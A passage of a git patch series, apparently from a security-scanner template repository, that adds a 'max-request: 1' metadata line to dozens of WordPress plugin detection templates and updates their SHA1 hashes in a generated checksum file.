a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From fee7f0b529e099a38385ba10e29fdf851f440362 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jul 2023 11:21:19 +0000 Subject: [PATCH 605/609] Auto Generated Templates Checksum [Tue Jul 11 11:21:19 UTC 2023] :robot: --- templates-checksum.txt | 405 ++++++++++++++++++++--------------------- 1 file changed, 202 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2102b01270..14d9b805cb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2434,7 +2434,7 @@ http/default-logins/jinher/jinher-oa-default-login.yaml:7b6f694950b7978486d73726 http/default-logins/jupyterhub/jupyterhub-default-login.yaml:501f2ac22106ea0073d1ac2c0c083455437cf85c http/default-logins/kanboard-default-login.yaml:a4f10800567ca5d353806c0c9c99c23090847dc8 http/default-logins/kettle/kettle-default-login.yaml:69e19c0142a96a07da2c294618bd9400b541b11e -http/default-logins/leostream/leostream-default-login.yaml:71f045ad48d5e51e8f50efb08e36cf171e2e14bc +http/default-logins/leostream/leostream-default-login.yaml:15df73e1f5c5dcc5466e644310d77c82be187638 http/default-logins/lutron/lutron-default-login.yaml:b928bf13b91efcdd0724bbc072bd47fdc1f04ae8 http/default-logins/magnolia-default-login.yaml:920de26b3cda779270b7a6c92df9dbc8113381bf http/default-logins/mantisbt/mantisbt-default-credential.yaml:ebb6707bd92a42e3d6fcdc923a724c3ee6ca1100 @@ -5373,7 +5373,6 @@ http/technologies/sap/sap-web-dispatcher.yaml:0fcce3bf9975b5997bd94993701c0a1601 http/technologies/sap-spartacus-detect.yaml:7ab38bb24d36e1a4e1a42d9241996b6eca893f1b http/technologies/sceditor-detect.yaml:38e4c7d3e0a1ea5435e10b357f11947d67ac7d5c http/technologies/secui-waf-detect.yaml:d266d1f5dc25e4216f5d86062d49f0a3df303483 -http/technologies/sharefile-storage-server.yaml:b76336153a7bfd3eafcd5c11faa5a959f42b4a7c http/technologies/shiro-detect.yaml:e3544725c98df08ed993a912094e3b8066af694e http/technologies/shopizer-detect.yaml:b8d558eb9bb9f426a04e3eeb7c574342f039f0a1 http/technologies/shopware-detect.yaml:446ef652c04a13ee0ab4abec201e2bb09e2fe48b @@ -5424,214 +5423,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 